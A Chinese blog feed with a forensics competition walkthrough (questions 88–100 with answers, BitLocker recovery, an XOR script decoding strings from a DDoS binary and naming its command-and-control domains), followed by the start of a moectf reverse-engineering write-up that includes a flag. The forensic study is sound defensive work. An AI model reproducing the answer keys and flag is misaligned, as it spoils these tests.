src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201110210522337.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201110210522337.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201110210522337"></p><p>打开密钥备份文件,用恢复密钥成功解锁硬盘:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201110210731636.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201110210731636.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201110210731636"></p><p>查看<code>db</code>文件,和我们前面逆向加密程序恢复的<code>db</code>一样。</p><p>里面还有那个网站的……所有东西,那我们把这个<code>dump</code>出来,:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111111604097.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111111604097.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201111111604097"></p><blockquote><ol start="88"><li><p>请重构被入侵的网站,并登陆网站后台管理界面,对该网站进行证据固定,可知该网站首页左侧导航栏,不包含下列那个内容:(<strong>D</strong>)</p><p> A. 信息列表 B. 资金管理 C. 资金数据 D. 会员信息</p></li><li><p>通过分析知,嫌疑人对目标服务器植入了勒索程序,请解密检材 2 中的被加密数据库,</p><p> 其<code>sha256</code>值为:(<strong>A</strong>)</p><p><code> A. 8dcf2f71482bb492b546eec746c714be9324ea254778bf5cbb9e5115b30c77a2</code></p><p><code> B. 8dcf2f71482bb492b546eec746c714be9324ea254778bf5cbb9e5115b30c77a3</code></p><p> <code>C. 8dcf2f71482bb492b546eec746c714be9324ea254778bf5cbb9e5115b30c77a4</code></p><p> <code>D.8dcf2f71482bb492b546eec746c714be9324ea254778bf5cbb9e5115b30c77a5</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111125021116.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111125021116.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201111125021116"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111112517872.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111112517872.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201111112517872"></p><blockquote><ol start="90"><li><p>通过分析知,嫌疑人有对目标服务器植入 <code>ddos </code>程序,对该程序进行功能性分析,可知该程序会将自身复制到目标机器的什么目录下:(<strong>B</strong>)</p><p><code> A. /etc B. /lib C. /root D. /tmp</code></p></li><li><p>通过分析知,嫌疑人有对目标服务器植入 ddos 程序,对该程序进行功能性分析,可知该程序主控地址为(多选):(<strong>AD</strong>)</p><p><code>A. shaoqian.f3322.net B. shaoqian.f3344.net C. gh.dsaj3a2.org D. gh.dsaj2a1.org</code></p></li></ol></blockquote><p>根据聊天记录易知,该<code>ddos</code>程序是<code>runit</code>,我们在检材四里面找到该文件,然后逆向分析……</p><p>我们在main函数里面看见有一些乱码,然后前面跟了解密函数。我们跟进然后机密看看:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112131329103.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112131329103.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201112131329103"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112131341467.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112131341467.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201112131341467"></p><p>然后我们再找找程序里面还有那些加密数据,然后写个脚本解一下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">enc=[<span class="string">"m7A4nQ_/nA"</span>,<span class="string">"m [(n3"</span>,<span class="string">"m6_6n3"</span>,<span class="string">"m4S4nAC/n&ZV"</span>,<span class="string">"m.[$n__#4%\\C"</span>,<span class="string">"m.[$n3"</span>,<span class="string">"m4S4nAC/nA"</span>,<span class="string">"m4S4nAC/n&ZV"</span>,<span class="string">"m.[$n__#4%\\C"</span>,<span class="string">"m.[$n3"</span>]</span><br><span class="line">a=[<span class="number">0x36</span>,<span class="number">0x46</span>,<span class="number">0x36</span>,<span class="number">0x7B</span>,<span class="number">0x1C</span>,<span class="number">0x19</span>,<span class="number">0x27</span>,<span class="number">0x34</span>,<span class="number">0x2D</span>,<span class="number">0x55</span>,<span class="number">0x1B</span>,<span class="number">0x50</span>,<span class="number">0x42</span>,<span class="number">0x27</span>,<span class="number">0x5A</span>,<span class="number">0x70</span>,<span class="number">0x23</span>,<span class="number">0x1C</span>,<span class="number">0x29</span>,<span class="number">0x33</span>,<span class="number">0x54</span>,<span class="number">0x19</span>,<span class="number">0x23</span>,<span class="number">0x6E</span>,<span class="number">0x34</span>,<span class="number">0x17</span>,<span class="number">0x45</span>,<span class="number">0x5C</span>,<span class="number">0x41</span>,<span class="number">0x79</span>,<span class="number">0x59</span>,<span class="number">0x26</span>,<span class="number">0x7F</span>,<span class="number">0x46</span>,<span class="number">0x23</span>,<span class="number">0x32</span>,<span class="number">0x47</span>]</span><br><span class="line">b=[<span class="number">0x25</span>,<span class="number">0x2A</span>,<span class="number">0x1C</span>,<span class="number">0x22</span>,<span class="number">0x32</span>,<span class="number">0x52</span>,<span class="number">0x5C</span>,<span class="number">0x73</span>,<span class="number">0x20</span>,<span class="number">0x70</span>,<span class="number">0x17</span>,<span class="number">0x5A</span>,<span class="number">0x46</span>,<span class="number">0x56</span>,<span class="number">0x7C</span>,<span class="number">0x2</span>,<span class="number">0x76</span>,<span class="number">0x76</span>,<span class="number">0x6</span>,<span class="number">0x3A</span>,<span class="number">0x32</span>,<span class="number">0x5B</span>,<span class="number">0x57</span>,<span class="number">0x2E</span>,<span class="number">0x30</span>,<span class="number">0x28</span>,<span class="number">0x58</span>,<span class="number">0x5B</span>,<span class="number">0x1A</span>,<span class="number">0x57</span>,<span class="number">0x75</span>,<span class="number">0x3</span>,<span class="number">0x70</span>,<span class="number">0x70</span>,<span class="number">0x1C</span>,<span class="number">0x29</span>,<span class="number">0x33</span>,<span class="number">0x54</span>,<span class="number">0x0C</span>,<span class="number">0x73</span>,<span class="number">0x75</span>,<span class="number">0x75</span>,<span class="number">0x0D</span>,<span class="number">0x49</span>,<span class="number">0x5</span>,<span class="number">0x9</span>,<span class="number">0x75</span>,<span class="number">0x1E</span>,<span class="number">0x74</span>,<span class="number">0x72</span>,<span class="number">0x1C</span>,<span class="number">0x74</span>,<span class="number">0x71</span>,<span class="number">0x1</span>,<span class="number">0x18</span>,<span class="number">0x73</span>,<span class="number">0x7B</span>,<span class="number">0x73</span>,<span class="number">0x0D</span>]</span><br><span class="line">key = [<span class="number">0x42</span>,<span class="number">0x42</span>,<span class="number">0x32</span>,<span class="number">0x46</span>,<span class="number">0x41</span>,<span class="number">0x33</span>,<span class="number">0x36</span>,<span class="number">0x41</span>,<span class="number">0x41</span>,<span class="number">0x41</span>,<span class="number">0x39</span>,<span class="number">0x35</span>,<span class="number">0x34</span>,<span class="number">0x31</span>,<span class="number">0x46</span>,<span class="number">0x30</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> enc:</span><br><span class="line"><span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(i)):</span><br><span class="line">print(<span class="built_in">chr</span>(<span class="built_in">ord</span>(i[j])^key[j%<span class="number">16</span>]),end=<span class="string">''</span>)</span><br><span class="line">print()</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(a)):</span><br><span class="line">print(<span class="built_in">chr</span>(a[i]^key[i%<span class="number">16</span>]),end=<span class="string">''</span>)</span><br><span class="line">print()</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(a)):</span><br><span class="line">print(<span class="built_in">chr</span>(b[i]^key[i%<span class="number">16</span>]),end=<span class="string">''</span>)</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112150926723.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112150926723.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201112150926723"></p><p>然后,,,然后我就不会了……至于复制到哪里,我是拿着答案去找的。main函数调用了一个daemon_process:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112152112264.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112152112264.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201112152112264"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112152342036.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112152342036.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201112152342036"></p><p>应该就是这样吧……</p><blockquote><p>Frank会长说:“一直纠结一个题就没意思了!”</p></blockquote><p>那就,,,放过吧~</p><blockquote><ol start="92"><li><p>压缩包 <code>test2-master.zip</code> 中的文件是什么?(<strong>C</strong>)</p><p> A.恶意软件 B.加密程序 C.密钥文件 D.下载软件</p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212304607.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212304607.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201111212304607"></p><blockquote><ol start="93"><li><p>应用程序 <code>TrueCrypt-7.2.exe </code>是在什么时间下载到本机的?(<strong>C</strong>)</p><p><code> A. 2019-07-06 00:04:38 B. 2019-07-06 00:06:38 C. 2019-07-06 00:08:38 D. 2019-07-06 00:10:38</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212528321.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212528321.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201111212528321"></p><blockquote><ol start="94"><li><p>文件 runit.txt 从哪个域名下载的?(<strong>D</strong>) </p><p> <code>A.https://pan.forensix.cn/lib/367d7f96-299f-4029-91a8-a31594b736cf/runit</code></p><p><code> B. https://pan.baidu.com/s/19uDE7H2RtEf7LLBgs5sDmg?errno=0&errmsg=AuthLoginSucess&&bduss=&ssnerror=0&traceid=</code></p><p> <code>C.https://pan.forensix.cn/seafhttp/files/dec88b97-b2bc-414f-93a3-dcbbc15d615/runit</code></p><p><code> D.https://pan.forensix.cn/seafhttp/files/8fdf1982-e323-4efe-ae28-2bba21b5162c/runit</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212723050.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212723050.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201111212723050"></p><blockquote><ol start="95"><li><p><code>BitLocker </code>密钥在什么位置?(<strong>B</strong>)</p><p> <code>A. D:/DOWNLOAD B. C:/USER C. C:/ D. D:/</code></p></li><li><p><code>BitLocker.rar </code>生成的时间是?(<strong>B</strong>)</p><p> <code>A. 2019-07-13 17:51:47 B. 2019-07-13 17:52:19 C. 2019-07-13 17:53:24 D. 2019-07-13 16:31:06</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212942950.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111212942950.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201111212942950"></p><blockquote><ol start="97"><li><p>文件 <code>we.tar.gz</code> 传输完成的时间是?(<strong>C</strong>)</p><p><code> A. 2019-07-13 16:31:06 B. 2019-07-13 16;33:00 C. 2019-07-13 16:33:15 D. 2019-07-13 16:33:30</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111213246657.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111213246657.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201111213246657"></p><blockquote><ol start="98"><li><p>嫌疑人在什么时间登陆网页微信?(<strong>A</strong>)</p><p> <code>A. 2019-07-13 16:34:55 B. 2019-07-13 16:40:13 C. 2019-07-13 16:45:45 D.2019-07-13 16:53:45</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111213636179.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111213636179.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201111213636179"></p><blockquote><ol start="99"><li><p>嫌疑人于 <code>2019-07-13 17:22:23 </code>下载了什么文件?(<strong>B</strong>)</p><p> A.网站目录压缩文件 B.数据库备份文件 C.网站日志文件 D.数据库日志文件</p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111215055052.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111215055052.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201111215055052"></p><blockquote><ol start="100"><li><p>硬盘 C 盘根目录中,文件<code>pagefile.sys.vhd</code>的作用是什么?(<strong>D</strong>)</p><p> A.<code> pagefile</code> 页面交换文件 B. 虚拟机启动文件 C. 系统配置文件 D. 虚拟磁盘</p></li></ol></blockquote><p>……在前面我们双击这个,然后解开<code>Bitlocker</code>,就挂载上了<code>D</code> 盘,所以应该是虚拟磁盘。</p>]]></content>
<categories>
<category> 电子取证学习 </category>
</categories>
<tags>
<tag> wp </tag>
<tag> 电子取证 </tag>
</tags>
</entry>
<entry>
<title>2020moectf Reverse</title>
<link href="2020/10/31/2020moectf-Reverse/"/>
<url>2020/10/31/2020moectf-Reverse/</url>
<content type="html"><![CDATA[<p><code>Reverse</code>是我得分第二高的模块。得这么多分,得感谢<code>void</code>大哥,然后感谢<code>RX</code>出题人跟我<code>py</code>……最后还是有三道题没做出来,唉<code>~</code>还是太菜了,我要继续向<code>void</code>大哥和<code>RX</code>师傅学习<code>~</code></p><p><img src="/images/2020moectf-Reverse/image-20201031022658022.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201031022658022.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201031022658022"></p><a id="more"></a><h2 id="我做出来的"><a href="#我做出来的" class="headerlink" title="我做出来的"></a>我做出来的</h2><h3 id="逆向工程入门指北"><a href="#逆向工程入门指北" class="headerlink" title="逆向工程入门指北"></a>逆向工程入门指北</h3><p>感谢<code>RX</code>大神的学习资料,我就收下啦~~</p><h3 id="Welcome-To-Re"><a href="#Welcome-To-Re" class="headerlink" title="Welcome To Re"></a>Welcome To Re</h3><p>拖进<code>IDA64</code>,找到<code>main</code>函数,<code>F5</code>反编译:</p><p><img src="/images/2020moectf-Reverse/image-20201015195648276.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015195648276.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015195648276"></p><blockquote><p>moectf{W3lc0me-T0_th3-W0rld_Of_R3v3rsE!}</p></blockquote><h3 id="Thank-you-Javascript"><a href="#Thank-you-Javascript" class="headerlink" title="Thank you Javascript"></a>Thank you Javascript</h3><p><img src="/images/2020moectf-Reverse/image-20201015200045087.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015200045087.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015200045087"></p><p>一般而言,,运行一下,心里舒坦……</p><p><img src="/images/2020moectf-Reverse/image-20201015201417408.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015201417408.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015201417408"></p><p>但运行出来也没什么用。</p><p><img src="/images/2020moectf-Reverse/image-20201015201444710.png" class="lazyload" data-srcset="/images/2020moectf-Reverse/image-20201015201444710.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201015201444710"></p><p>混淆???我们查一下,关键字搜索“<code>JS</code> 